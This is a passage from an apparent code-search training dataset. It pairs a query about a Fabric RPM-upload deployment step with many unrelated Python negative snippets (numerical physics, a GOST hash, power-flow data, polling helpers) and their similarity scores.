report=True)\n self.report_isycmd('DON')\n return True", "def polling_call(self) -> global___Snippet.ClientCall:", "def crawl_new_url(self):\n url_returned = self.obj_scheduler.get_next_url()\n \n if self.obj_scheduler.can_fetch_page(url_returned[0]):\n return None\n else:\n binary_content = self.request_url(url_returned[0])\n \n if binary_content != None:\n return self.discover_links(url_returned[0], url_returned[1], binary_content)\n else:\n return None", "def _do_connectivity(self, tstep):\n return ((tstep > 0) and (tstep % self.overset_update_interval) == 0)", "def fallback_to_ondemand(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"fallback_to_ondemand\")", "def wait_for_url(url, status_code=200, sleep_duration_seconds=1, iterations=120, message_frequency=15):\n for iteration in range(iterations):\n print(\".\", end='')\n sys.stdout.flush()\n response = requests.get(url)\n if response.status_code == status_code:\n print(\".\")\n return True\n sleep(sleep_duration_seconds)\n print(\".\")\n return False", "def check_connection(self, logger, config: Mapping[str, Any]) -> Tuple[bool, Any]:\n try:\n # we use metrics endpoint because it never returns an error\n _ = list(Metrics(api_key=config[\"api_key\"]).read_records(sync_mode=SyncMode.full_refresh))\n except Exception as e:\n return False, repr(e)\n return True, None", "def IsReadyForRefresh(self, name):\n if(self.data[name]['GET']['refresh_countdown'] == 0x00):\n return True\n \n self.data[name]['GET']['refresh_countdown'] = self.data[name]['GET']['refresh_countdown'] - 1 \n return False", "def is_on(self):\n if self.is_update_locked():\n return self.graceful_state\n if self._state['action'] == 1 and self._state['state'] == 2:\n return True\n return False", "def check_completion(self):\n\n time.sleep(3)\n while self.status == 0:\n pass", "def poll(cls, context):\r\n return context.object.animation_data.action is not None", "def online_check(self):\n self.online = False\n online_topic = '{t_topic}/INFO2'.format(**self)\n print('{BLUE}Watching for {}{NC}'.format(online_topic, **colors))\n try:\n self.mqtt.connect(self.mqtt_host)\n except Exception:\n print('MQTT broker not online')\n return False\n\n self.mqtt.message_callback_add(online_topic, lambda *args: \\\n setattr(self, 'online', True))\n self.mqtt.subscribe(online_topic)\n startTime = dt.datetime.now()\n while not self.online and not too_old(startTime, wait_time):\n self.mqtt.loop(timeout=loop_time)\n time_waited = (dt.datetime.now() - startTime).total_seconds()\n # If we did not see device publish INFO2, sometimes platformio causes\n # a delay by checking for updates and we miss seeing this message.\n # To check for that case, query the device for its build timestamp and\n # check if it was built in the last couple minutes.\n if not self.online:\n self.query_tas_status()\n if 'build_time' in self.reported:\n build_time = dt.datetime.strptime(self.reported['build_time'],\n '%Y-%m-%dT%H:%M:%S')\n if dt.datetime.now() - build_time < dt.timedelta(minutes=2):\n self.online = True\n\n if not self.online:\n print('{RED}{f_name} did not come online within {wait_time} '\n 'seconds{NC}'.format(f_name=self.f_name,\n wait_time=str(wait_time),\n **colors))\n elif self.online:\n print('{GREEN}{f_name} came online in {time_waited} '\n 'seconds{NC}'.format(f_name=self.f_name,\n time_waited=time_waited,\n **colors))\n self.mqtt.unsubscribe(online_topic)\n self.mqtt.message_callback_remove(online_topic)\n self.mqtt.disconnect()\n return self.online", "def fan_timer_active(self) -> bool:\r\n self._logger.debug(log_message_formatter(\r\n \"get\", f\"{self}\", \"fan_timer_active\"))\r\n return datetime.fromisoformat(self.fan_timer_timeout) > datetime.now()", "def __call__(self, event):\n self.last = LOOP_TIME()\n if event.chunk_index + 1 != event.chunk_count:\n return False\n \n self.waiter.set_result_if_pending(True)\n timer = self.timer\n if (timer is not None):\n self.timer = None\n timer.cancel()\n \n return True", "def _stale_check_url(args):\n if not args.keep_scripts:\n return _GH_STALE_CHECK\n\n return None", "def __ensure_fetching_rate_limit(self) -> None:\n current = datetime.now()\n difference = current - self.fetched_last\n time_to_wait = FETCH_MINIMUM_WAIT_SECONDS - difference.total_seconds()\n if time_to_wait > 0:\n time.sleep(time_to_wait)\n\n self.fetched_last = datetime.now()", "def check_if_ok_to_update(self):\n current_time = int(time.time())\n last_refresh = self.last_refresh\n if last_refresh is None:\n last_refresh = 0\n if current_time >= (last_refresh + self.refresh_rate):\n return True\n return False", "def rate_limiting(cls):\n this_click_time = time.time()\n time_to_last_click = None\n if cls.last_click_time:\n time_to_last_click = this_click_time - cls.last_click_time\n cls.last_click_time = this_click_time\n return time_to_last_click and time_to_last_click < 0.7", "def check_loop(\n url, period=5, timeout=10, body_check_re='',\n producer=None, oneshot=False):\n while True:\n worker = threading.Thread(target=check, kwargs={\n 'url': url,\n 'timeout': timeout,\n 'body_check_re': body_check_re,\n 'producer': producer,\n })\n logger.info('check url=%s' % url)\n worker.start()\n time.sleep(period)\n if oneshot:\n return", "def check( log = False):\n return True", "def internet_on(): \n try:\n urlopen('http://www.google.com', timeout=2)\n return True\n except urlopen.URLError as err: \n return False", "def is_retryable(self) -> Optional[bool]:\n return pulumi.get(self, \"is_retryable\")", "def _iswaiting(self):\n return self._ison() or self._isstandby()" ]
[ "0.6179781", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.6099804", "0.60813695", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.6056094", "0.60036206", "0.59700084", "0.59700084", "0.59700084", "0.5922929", "0.5922929", "0.5922929", "0.5922929", "0.5922929", "0.5922929", "0.5922929", "0.58766496", "0.5829096", "0.56240463", "0.5593074", "0.55897635", "0.55557585", "0.5529277", "0.5488584", "0.54618543", "0.53944844", "0.5358611", "0.5317789", "0.52986324", "0.52652043", "0.5208374", "0.51787215", "0.51758015", "0.5143727", "0.513495", "0.5134206", "0.50979805", "0.50461066", "0.50425625", "0.5042184", "0.503387", "0.5024952", "0.50190115", "0.50159836", "0.49845278", "0.49806824", "0.49713758", "0.49435583", "0.4938417", "0.49363336", "0.49303222", "0.49218786", "0.49171567", "0.49025097", "0.48986983", "0.48981524", "0.48962694", "0.4892972", "0.48763204", "0.48685038", "0.4862226", "0.4861443", "0.4859878", "0.4831437", "0.48292214", "0.48254856", "0.48240402", "0.48226225" ]
0.0
-1
Implementation of TPMINVNOM00000 Step 1.1
def upload(version=minv.__version__, release="1"): version = version or minv.__version__ put( join( env.builder_path, "build/RPMS/minv-%s-%s.noarch.rpm" % (version, release) ), "" ) put("minv/package/minv_install_postgresql.sh", "") sudo("chmod a+x minv_install_postgresql.sh") with lcd(env.ink_path): for rpm in RPMS: put(rpm, "")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def test_get_nveto_pmts(self):\n pass", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def test_post_nveto_pmts(self):\n pass", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def prove_N() -> Proof:\n # Optional Task 6.8", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + 